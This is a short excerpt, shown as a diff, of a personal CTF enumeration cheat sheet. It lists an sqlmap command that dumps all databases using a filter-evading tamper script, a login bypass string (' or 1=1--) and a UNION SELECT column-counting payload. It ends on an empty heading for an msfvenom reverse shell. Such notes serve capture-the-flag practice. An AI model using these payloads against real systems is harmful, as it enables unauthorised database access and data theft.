geoffchisnall/Resources/CTF Basic Enumeration.md

 - `sqlmap -r req.txt --tamper=space2comment --dump-all --dbms mysql`

 - try `' or 1=1--` in the username and password field
-- enumrate how many columns there are
+- enumerate how many columns there are
 - `user='UNION SELECT NULL,'test',NULL,NULL--&password=admin`

 ### msfvenom and msfconsole reverse shell